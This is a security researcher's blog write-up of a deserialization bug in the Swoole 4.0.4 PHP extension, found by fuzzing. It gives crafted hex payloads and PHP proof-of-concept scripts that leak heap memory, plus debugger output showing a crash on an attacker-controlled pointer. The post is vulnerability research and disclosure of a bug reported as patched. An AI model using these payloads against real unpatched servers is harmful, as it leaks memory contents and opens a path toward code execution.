X-C3LL's Personal Blog :)
Last weekend I was playing around (de)serialization and PHP when I discovered a vulnerability inside Swoole (version 4.0.4) deserialization routines. Let’s talk a bit about the vulnerability!
I started searching for serialization / deserialization functions implemented in PHP.net when I found this little one: Swoole\Serialize->unpack(). The first step was to search for known reported vulnerabilities in that function because in general, serialization / deserialization is hard to implement correctly and this kind of functions historically are prone to contains interesting vulnerabilities (just keep an eye on the PHP core and all the vulnerabilities related with unserialize()). Total vulnerabilities publicly disclosed: 0. Weird as hell.
As any vulnerability related with this function was reported, maybe we have an oportunity :)
In order to generate a corpus to start the fuzzing process I used as seed the ones provided by the funserialize repo from Sean Heelan. The serialized seeds are known to trigger bugs in PHP unserialize() function, so this kind of inputs are perfect to discover problematic paths inside serialization / deserialization routines. We only need to translate the serialization format to one that Swoole understand. This stupid snippet does the job:
<?php
$data = $argv[1];
$test = unserialize($data);
echo "[+] UNSERIALIZED:\n";
var_dump($test);
$obj = new \Swoole\Serialize();
echo "[+] Swoole Serialized: \n";
$sor = $obj->pack($test);
echo bin2hex($sor) . "\n";
?>
So with one of the test-cases provided by the funserialize repo we obtain an hex output that is the representation of the serialized object:
⇒ php tester.php 'a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:4919;}}'
[+] UNSERIALIZED:
array(2) {
[123]=>
array(2) {
[123]=>
*RECURSION*
[1]=>
object(stdClass)#1 (1) {
["prop"]=>
int(4919)
}
}
[1]=>
object(stdClass)#1 (1) {
["prop"]=>
int(4919)
}
}
[+] Swoole Serialized:
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46
We can save this hexadecimal representation in files and then feed our mutator in order to generate malformed inputs. In this case, we only used a bitfliping approach and hundreds of crashes appeared in few minutes. To test the inputs, just use this snippet that calls the target function:
<?php
$test = file_get_contents($argv[1]);
$obj = new \Swoole\Serialize();
$ser = $obj->unpack($test);
?>
One of the crashes that looked interesting was one that… well… it was not a sigsegv. It is:
Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 725984920982417440 bytes) in /research/swoole-ext/hextester.php on line 5
Hum… Ok. Lets check the differences between the original input (not mutated) and the one that produces this crazy allocation:
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46 e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46
Changing a 1 for a 3 and it tries to allocate almost 726 Petabytes. That is insane. It is a weird number, right? but if we turn it from decimal to hexadecimal….
>>> hex(725984920982417440)
'0xa1337706f727020'
Ok, that string with a 1337 looks familiar… lets change it a bit…
>>> a = str(hex(725984920982417440))[3:].decode("hex")[::-1].encode("hex")
>>> print a
2070726f703713
So in the deserialization process the extension is performing an allocation based on a value inside the string that we provide:
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46 e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46
As it tried to allocate hundreds of petabytes, we can guess that the size asked to allocate is not checked properly. And a size not checked correctly means tons of fun. Reading diagonally the code we can spot the lines where the allocation is made:
void *str_pool_addr = get_pack_string_len_addr(&buffer, &key_len);
p->key = zend_string_init((char*) str_pool_addr, key_len, 0);
The zend_string_init function creates a zend_string structure and copy from the pointer (first argument) the size (second argument) desired. The size to copy is setted via get_pack_string_len_addr() function:
get_pack_string_len_addr(void ** buffer, size_t *strlen)
{
...
*strlen = *((unsigned short*) str_pool_addr);
...
Put a breakpoint in the allocation and run again the crash:
pwndbg> print key_len
$116 = 725984920982417412
So our theory was right, the key_len extracted via get_pack_string_len_addr() is used in the allocation. In the not-mutated serialized data the value is:
Breakpoint swoole_serialize.c:709
pwndbg> print key_len
$117 = 4
Mmm… and if we change the original c1 for a a0?
Breakpoint swoole_serialize.c:709
pwndbg> print key_len
$119 = 8030604250369323891
>>> a = str(hex(8030604250369323891))[2:].decode("hex")[::-1].encode("hex")
>>> print a
7373018b0470726f
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46 e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fa0003713454f46
The value taken was shifted. Nice!
At this point we triaged the issue that makes our code to crash. Now its time to start playing a bit with this little boy. If we calculate the right position, the key_len value used for the allocation will be controlled by us (as we can serialize any integer), so we can leak an arbitrary size of memory. Let’s try to leak 255 bytes (ff):
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f46
<?php
$data = "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f46";
$obj = new \Swoole\Serialize();
$sor = hex2bin($data);
$ser = $obj->unpack($sor);
echo "[+] Swoole Unserialized:\n";
var_dump($ser);
echo "[+] Memory Leaked:\n";
$keys = key(get_object_vars($ser[1]));
echo bin2hex($keys);
echo "\n[+] Size: \n";
echo strlen($keys);
?>
Nailed!
⇒ php memory_leak.php
[+] Swoole Unserialized:
array(2) {
[123]=>
array(2) {
[123]=>
array(2) {
[123]=>
NULL
[1]=>
object(stdClass)#2 (1) {
["prop"]=>
int(-201)
}
}
[1]=>
object(stdClass)#3 (1) {
["prop"]=>
int(4919)
}
}
[1]=>
object(stdClass)#4 (1) {
["
stdClass7
stdClass7EOFH@@`p@ @P@"]=>
int(4919)
}
}
[+] Memory Leaked:
0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f460000c0f0c702bd
7f000048f0c702bd7f0000400000000000000040b2c702bd7f00000614000002000000050200000200000060f0c7
02bd7f000070f0c702bd7f00004000000000000000c093c602bd7f00000614000003000000000100000300000020
f1c702bd7f0000400000000000000050b1c602bd7f000006140000030000004000000000000000c815c002bd7f00
00061400000300000080000000030000000000000000000000000000000000000000000000000000000000000000
00000080f1c702bd7f00000e02000003000000c8f0c702bd7f
[+] Size:
255%
Playing a bit you can perform bigger leaks, like this one (24946 bytes):
<?php
$data = "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018ff6003713454f46";
$obj = new \Swoole\Serialize();
$sor = hex2bin($data);
$ser = $obj->unpack($sor);
echo "[+] Swoole Unserialized:\n";
var_dump($ser);
echo "[+] Memory Leaked:\n";
$keys = key(get_object_vars($ser[1]));
echo bin2hex($keys);
echo "\n[+] Size: \n";
echo strlen($keys);
?>
Let’s try to change our seed (‘a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:4919;}}
’) for one with a bigger integer (0x41414141 == 1094795585) and compare them:
[4919 (0x1337)]
e8 02 ea7b 02ea 7b 02 22 7b0a
01 08 00 737464436c617373
01 8b 04 70726f70 37130a
01 08 00 737464436c617373
01 8f c1 0037130a
01 08 00 737464436c617373
01 8f c1 003713
454f46
[1094795585 (0x41414141)]
e8 02 ea7b 02ea 7b 02 22 7b0a
01 08 00 737464436c617373
01 93 04 70726f70 414141410a
01 08 00 737464436c617373
01 97 c1 00414141410a
01 08 00 737464436c617373
01 97 c1 0041414141
454f46
So the difference is from 8f (with 2 bytes, 3713) to 97 (with 4 bytes, 41414141) -please spot that the difference between 8f and 97 is 8-. What happens if we change that 97 for a 8f in the last entry?
e802ea7b02ea7b02227b0a010800737464436c61737301930470726f70414141410a010800737464436c6173730197c100414141410a010800737464436c617373018fc10041414141454f46
[+] Swoole Unserialized:
array(2) {
[123]=>
array(2) {
[123]=>
array(2) {
[123]=>
NULL
[1]=>
object(stdClass)#2 (1) {
["prop"]=>
int(1094795585)
}
}
[1]=>
object(stdClass)#3 (1) {
["prop"]=>
int(1094795585)
}
}
[1]=>
object(stdClass)#4 (1) {
["prop"]=>
int(16705)
}
}
The 16705 vs the 1094795585 expected means that only 2 bytes were taken (16705 == 0x4141). What happens if we put it to zero?
e802ea7b02ea7b02227b0a010800737464436c61737301930470726f70414141410a010800737464436c6173730197c100414141410a010800737464436c6173730100c10041414141454f46
...
44 static zend_always_inline void i_zval_ptr_dtor(zval *zval_ptr ZEND_FILE_LINE_DC)
45 {
46 if (Z_REFCOUNTED_P(zval_ptr)) {
47 zend_refcounted *ref = Z_COUNTED_P(zval_ptr);
► 48 if (!--GC_REFCOUNT(ref)) {
49 _zval_dtor_func(ref ZEND_FILE_LINE_RELAY_CC);
....
Program received signal SIGSEGV (fault address 0x41414141)
pwndbg> i r
rax 0x41414141 1094795585
rbx 0x0 0
rcx 0x14 20
rdx 0x1 1
rsi 0x7ffff3864b60 140737279052640
rdi 0x7ffff38023f0 140737278649328
rbp 0x7fffffff7480 0x7fffffff7480
rsp 0x7fffffff73d0 0x7fffffff73d0
r8 0xffff 65535
r9 0x7fffffff79fc 140737488321020
r10 0x941 2369
r11 0x555555bbc584 93824998950276
r12 0x555555684d10 93824993479952
r13 0x7fffffffe460 140737488348256
r14 0x7ffff381c030 140737278754864
r15 0x7ffff3870160 140737279099232
rip 0x555555bc0850 0x555555bc0850 <zend_array_destroy+487>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
Oh snaps! Is that a mighty zval_ptr_dtor? Is that our brave 0x41414141? And can we copy structures freely as we seen before? Can we leak memory too? This looks like an adventure for you, my dearest reader :).
The vulnerability is already patched in the GitHub master branch (it is a live project with updates almost daily). I am not sure if this kind of articles are useful, but at least it works as a “log” to myself. If you find it interesting, or spot any error or typo, feel free to contact me at twitter (@TheXC3LL).